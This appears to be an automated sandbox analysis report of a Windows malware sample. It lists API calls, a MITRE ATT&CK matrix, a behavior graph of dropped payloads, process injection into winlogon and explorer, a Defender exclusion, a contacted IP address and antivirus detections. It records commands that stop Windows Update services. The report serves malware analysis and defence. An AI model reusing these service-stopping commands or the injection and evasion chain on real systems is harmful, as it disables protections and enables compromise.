            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,54_2_00007FF7FB4C1C64
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0041E4B6 GetLocalTime,19_2_0041E4B6
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0041E514 GetUserNameW,19_2_0041E514
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003FBCA2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,19_2_003FBCA2
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Stops critical windows services
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
            Source: MindZenithPro.pifBinary or memory string: WIN_81
            Source: MindZenithPro.pifBinary or memory string: WIN_XP
            Source: MindZenithPro.pifBinary or memory string: WIN_XPe
            Source: MindZenithPro.pifBinary or memory string: WIN_VISTA
            Source: MindZenithPro.pif, 00000014.00000000.1684457159.0000000000483000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: MindZenithPro.pifBinary or memory string: WIN_7
            Source: MindZenithPro.pifBinary or memory string: WIN_8
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0044198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_0044198B
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00441F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00441F8D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		2
            Valid Accounts            		1
            Windows Management Instrumentation            		11
            Scripting            		1
            Exploitation for Privilege Escalation            		211
            Disable or Modify Tools            		1
            Credential API Hooking            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API            		11
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Credential API Hooking            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		2
            Valid Accounts            		11
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin Shares21
            Input Capture            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job            		1
            Windows Service            		2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS27
            System Information Discovery            		Distributed Component Object Model3
            Clipboard Data            		12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts1
            Service Execution            		1
            Scheduled Task/Job            		21
            Access Token Manipulation            		1
            Timestomp            		LSA Secrets321
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media3
            PowerShell            		RC Scripts1
            Windows Service            		11
            DLL Side-Loading            		Cached Domain Credentials141
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items813
            Process Injection            		4
            Rootkit            		DCSync4
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
            Scheduled Task/Job            		112
            Masquerading            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
            Valid Accounts            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron141
            Virtualization/Sandbox Evasion            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
            Access Token Manipulation            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task813
            Process Injection            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
            Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
            Hidden Files and Directories            		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483258 Sample: hfi47s4wOT.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 137 uJZnxDofibxcgfjvDTnvqoPmvCzWh.uJZnxDofibxcgfjvDTnvqoPmvCzWh 2->137 157 Antivirus detection for URL or domain 2->157 159 Antivirus detection for dropped file 2->159 161 Multi AV Scanner detection for dropped file 2->161 163 21 other signatures 2->163 15 hfi47s4wOT.exe 47 2->15         started        18 cmd.exe 2->18         started        20 wscript.exe 2->20         started        22 5 other processes 2->22 signatures3 process4 signatures5 191 Found stalling execution ending in API Sleep call 15->191 24 cmd.exe 2 15->24         started        193 Stops critical windows services 18->193 28 conhost.exe 18->28         started        30 sc.exe 18->30         started        40 4 other processes 18->40 195 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->195 32 MindZenithPro.pif 20->32         started        197 Loading BitLocker PowerShell Module 22->197 34 MindZenithPro.pif 22->34         started        36 conhost.exe 22->36         started        38 conhost.exe 22->38         started        42 7 other processes 22->42 process6 file7 109 C:\Users\user\AppData\Local\...\Surrey.pif, PE32 24->109 dropped 167 Drops PE files with a suspicious file extension 24->167 169 Uses schtasks.exe or at.exe to add and modify task schedules 24->169 44 Surrey.pif 5 24->44         started        48 cmd.exe 2 24->48         started        50 conhost.exe 24->50         started        52 7 other processes 24->52 signatures8 process9 file10 115 C:\Users\user\AppData\...\MindZenithPro.pif, PE32 44->115 dropped 117 C:\Users\user\AppData\...\MindZenithPro.js, ASCII 44->117 dropped 119 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 44->119 dropped 185 Drops PE files with a suspicious file extension 44->185 187 Writes to foreign memory regions 44->187 189 Injects a PE file into a foreign processes 44->189 54 RegAsm.exe 2 44->54         started        57 RegAsm.exe 44->57         started        59 cmd.exe 1 44->59         started        61 schtasks.exe 1 44->61         started        signatures11 process12 signatures13 165 Encrypted powershell cmdline option found 54->165 63 powershell.exe 15 18 54->63         started        68 powershell.exe 57->68         started        70 conhost.exe 59->70         started        72 schtasks.exe 1 59->72         started        74 conhost.exe 61->74         started        process14 dnsIp15 139 51.77.140.74, 49741, 80 OVHFR France 63->139 103 C:\Users\user\AppData\Local\Temp\Update.exe, PE32+ 63->103 dropped 155 Powershell drops PE file 63->155 76 Update.exe 63->76         started        79 conhost.exe 63->79         started        81 Update.exe 68->81         started        83 conhost.exe 68->83         started        file16 signatures17 process18 file19 121 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 76->121 dropped 123 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 76->123 dropped 125 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 76->125 dropped 133 49 other malicious files 76->133 dropped 85 Update.exe 76->85         started        127 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 81->127 dropped 129 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 81->129 dropped 131 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 81->131 dropped 135 49 other malicious files 81->135 dropped 88 Update.exe 81->88         started        process20 file21 105 C:\Users\user\AppData\...\tmp11jjwww2.exe, PE32+ 85->105 dropped 90 tmp11jjwww2.exe 85->90         started        107 C:\Users\user\AppData\...\tmpgtnhdrk0.exe, PE32+ 88->107 dropped 94 tmpgtnhdrk0.exe 88->94         started        process22 file23 111 C:\Users\user\AppData\...\nfngdkpnjkmg.tmp, PE32+ 90->111 dropped 171 Suspicious powershell command line found 90->171 173 Writes to foreign memory regions 90->173 175 Modifies the context of a thread in another process (thread injection) 90->175 177 Found direct / indirect Syscall (likely to bypass EDR) 90->177 96 dialer.exe 90->96         started        113 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 94->113 dropped 179 Found hidden mapped module (file has been removed from disk) 94->179 181 Adds a directory exclusion to Windows Defender 94->181 183 Maps a DLL or memory area into another process 94->183 99 dialer.exe 94->99         started        signatures24 process25 signatures26 141 Suspicious powershell command line found 96->141 143 Contains functionality to inject code into remote processes 96->143 145 Writes to foreign memory regions 96->145 153 2 other signatures 96->153 101 winlogon.exe 96->101 injected 147 Injects code into the Windows Explorer (explorer.exe) 99->147 149 Allocates memory in foreign processes 99->149 151 Creates a thread in another existing process (thread injection) 99->151 process27

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            hfi47s4wOT.exe5%ReversingLabs
            hfi47s4wOT.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1329574
            C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
            C:\Program Files\Google\Chrome\updater.exe67%ReversingLabsWin64.Trojan.Whisperer
            C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\287175\Surrey.pif0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\Update.exe3%ReversingLabsWin64.Malware.Generic
            C:\Users\user\AppData\Local\Temp\_MEI57242\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
